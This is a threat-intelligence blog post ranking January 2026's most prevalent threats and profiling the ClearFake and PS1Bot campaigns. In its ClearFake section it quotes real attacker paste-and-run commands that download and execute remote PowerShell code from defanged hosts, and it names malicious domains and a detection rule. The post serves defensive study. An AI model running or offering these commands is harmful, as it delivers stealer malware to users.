Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
Resources Blog Threat intelligence

Intelligence Insights: February 2026

Intelligence Insights: February 2026

RMMs reign, ClearFake and PS1Bot debut in this month’s edition of Intelligence Insights

The Red Canary Team

Highlights from January

The top two spots of our top 10 most prevalent threat list this month are both remote monitoring and management (RMM) tools: ScreenConnect at number 1, and NetSupport Manager in 2nd.

ScreenConnect is a ConnectWise product that administrators and adversaries alike use to remotely access and manage devices. It can be a challenge for Red Canary to glean insights into what happens before initial execution on an endpoint, but it seems many of the malicious ScreenConnect installations we detected in January 2026 began with phishing. The phishing lures, either directly or via URL redirects, result in users downloading ScreenConnect MSI installers. Sometimes the MSI files are disguised as documents, with names like document_53ff927a.msi; we continue to see party-invitation-style lures as well. If successfully installed, these instances of ScreenConnect then reach out to malicious infrastructure, for example fedralcourt[.]im, and can subsequently lead to hands-on-keyboard abuse by the operators if not remediated.

 

 

NetSupport Manager is a legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access. It remains a popular payload for adversaries; in January we saw it delivered via campaigns leveraging T1204.004 User Execution: Malicious Copy and Paste (aka paste and run, ClickFix, FakeCAPTCHA), as well as by threats like Scarlet Goldfinch, Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. Scarlet Goldfinch is tied for third on this month’s top 10 list.

Sharing the tie for third is ClearFake, an activity cluster first identified in 2023 that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques. We started seeing and tracking ClearFake at Red Canary in 2024, as one of the first threats to leverage paste and run as an initial execution technique. It’s debuting in the top 10 this month because we recently reassessed the way we track it, making it eligible for inclusion in the top 10. We also observed increased ClearFake activity in January 2026. You can read more about ClearFake below.

Also tying for third is PS1Bot, a modular PowerShell-based information stealer that uses the .NET framework to implement additional capabilities. We’ve been tracking this cluster at Red Canary since March 2025; we reassessed and changed our PS1Bot tracking, making it eligible for top 10 inclusion, and we also saw an increase in activity over the last two months. PS1Bot has several known modules—a keylogger, a screen capture module, and an information-stealing module—and applies these by directly accessing Windows APIs using the .NET framework. The information stealer module is capable of collecting potentially sensitive files like:

  • files related to passwords
  • files that may contain cryptocurrency wallet seed phrases
  • information about any MFA applications that may be on the system

PS1Bot initial access often occurs via search engine optimization (SEO) poisoning  and malvertising campaigns that lead users to download a malicious ZIP file. The malicious ZIP archive names typically match the user’s search terms, like guide for planning design and operation of pedestrian facilities.zip and free daily chronicles for seniors pdf.zip. The ZIP archive contains a malicious JavaScript file named FULL DOCUMENT.js that executes via wscript.exe and reaches out to adversary infrastructure, downloading and installing PS1Bot in a randomly named ProgramData subdirectory. Additional indicators of PS1Bot installation include a randomly named two-to-eight-character PowerShell script, and follow-on scriptloads that contain .NET code as PS1Bot executes its modules.

We have observed PS1Bot precede the execution of Rhadamanthys, an information stealer written in C++ that is used to steal credentials, cryptocurrency wallets, and browser data, while also downloading and executing additional payloads.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for January 2026:

Month's rankThreat nameThreat description
Month's rank:

1

Threat name:Threat description :

ConnectWise product that administrators and adversaries alike use to remotely access and manage devices

Month's rank:

2

Threat name:Threat description :

Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access

Month's rank:

3*

Threat name:Threat description :

Red Canary's name for a cluster of activity, delivered via installers masquerading as legitimate free software, that progresses through several stages to a PyInstaller EXE with stealer capabilities

Month's rank:

3*

Threat name:

ClearFake

Threat description :

Activity cluster that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques, often using fake CAPTCHA lures to trick users into executing code via malicious copy and paste

Month's rank:

3*

Threat name:

PS1Bot

Threat description :

Modular, PowerShell-based information stealer that uses the .NET framework to implement additional capability

Month's rank:

3*

Threat name:Threat description :

Red Canary's name for an activity cluster that uses compromised web sites to trick users into executing malicious code

Month's rank:

7*

Threat name:Threat description :

Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

7*

Threat name:Threat description :

Loader designed to maintain persistence and deliver additional threats

Month's rank:

7*

Threat name:Threat description :

Traffic distribution system, first observed in 2024, that uses compromised WordPress sites to deploy malicious code that may lead to malware families such as Rhysida and Interlock ransomware, D3F@ck Loader, Mocha Manakin, Mintsloader, and WARMCOOKIE

Month's rank:

10*

Threat name:

Ande Loader

Threat description :

PowerShell and .NET Framework-based threat designed to use steganography to deliver additional malware

Month's rank:

10*

Threat name:Threat description :

Electron Node.JS-based threat designed to process steganographic content with arbitrary JavaScript code delivered alongside recipes for meals

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Clearly corrupt: ClearFake

 

 

ClearFake is a malicious activity cluster characterized by a complex execution chain between page load and payload delivery. ClearFake operators compromise legitimate websites and inject JavaScript code that will execute upon page load. The JavaScript can point to a variety of services to redirect user traffic and load additional scripts. Over time, ClearFake injects have pointed to the serverless platform Cloudflare Workers, GitHub repositories, and Web3.js libraries used to interact with blockchain networks like Binance Smart Chain—a technique called “etherhiding”—to host and retrieve malicious instructions.

A code snippet from Expel showing the ClearFake etherhiding POST call to bsc-testnet.drpc[.]org

When a user visits a website—typically a WordPress site—compromised by ClearFake, the page initially loads normally before the whole page is taken over by a call to action to prompt user interaction. In 2023 and early 2024, these prompts were typically to update Chrome, but it has since adopted additional prompts. In April 2024, it was seen using ClickFix, aka paste and run, with a web inject that would display a pop-up prompting users to “fix” the display of the compromised website. In late 2025 and early 2026, including January 2026, we’ve seen ClearFake most frequently use the fake CAPTCHA variant of paste and run lures.

To evade detection, the specific script formats used by ClearFake for initial execution after successful prompt interaction have evolved over time. In November and December 2025 we saw initial execution with commands leveraging mshta.exe. More recently, in January 2026, ClearFake abused the legitimate SyncAppvPublishingServer.vbs for initial access, for example:

"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\SyncAppvPublishingServer.vbs" "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/grading-chatter-dock73/vigilant-bucket-gui/p1lot')"

Red Canary and other researchers are tracking ongoing use of ClearFake for malware distribution. The most recent examples we have at the time of publication, from February 2026, begin with pasted commands leveraging PowerShell:

  • "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -c iex(irm 158.94.209[.]33 -UseBasicParsing)
  • "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$w=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$w.Open('GET','https[:]//cdn[.]jsdelivr[.]net/gh/www1day7/msdn/fase32',0);$w.Send();$f=$env:TEMP+'\FVL.ps1';$w.ResponseText>$f;powershell -w h -ep bypass -f $f"

Successful interaction with ClearFake lures has led to the delivery of a variety of stealer payloads, including Amadey, ArechClientC2, and LummaC2.

We continue to recommend training for end users, focusing on identifying, reporting, and avoiding fake browser updates and fake CAPTCHA lures. Detecting execution of paste and run goes a long way toward catching ClearFake before it can download any payloads. Also, ClearFake’s recent use of PowerShell to reach out to remote resources gives us a detection opportunity.

Detection opportunity: PowerShell using invoke-expression and invoke-restmethod to download content at a remote IP address.

This pseudo detection analytic identifies instances of PowerShell using invoke-expression and  invoke-restmethod to download content from a remote IP address. Adversaries like ClearFake use this function to download remotely hosted scripts and payloads for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.

process== ('powershell')
&&
deobfuscated_command_includes ('irm' || 'invoke-restmethod')
&&
deobfuscated_command_includes ('iex' || 'invoke-expression')
&&
deobfuscated_command_includes (IP address)
&&
deobfuscated_command_excludes (approved IP address)
 

Intelligence Insights: January 2026

 

Intelligence Insights: December 2025

 

Beyond the bomb: When adversaries bring their own virtual machine for persistence

 

Intelligence Insights: November 2025

Subscribe to our blog

Security gaps? We got you.

Sign up for our monthly email newsletter for expert insights on MDR, threat intel, and security ops—straight to your inbox.


 
 
Back to Top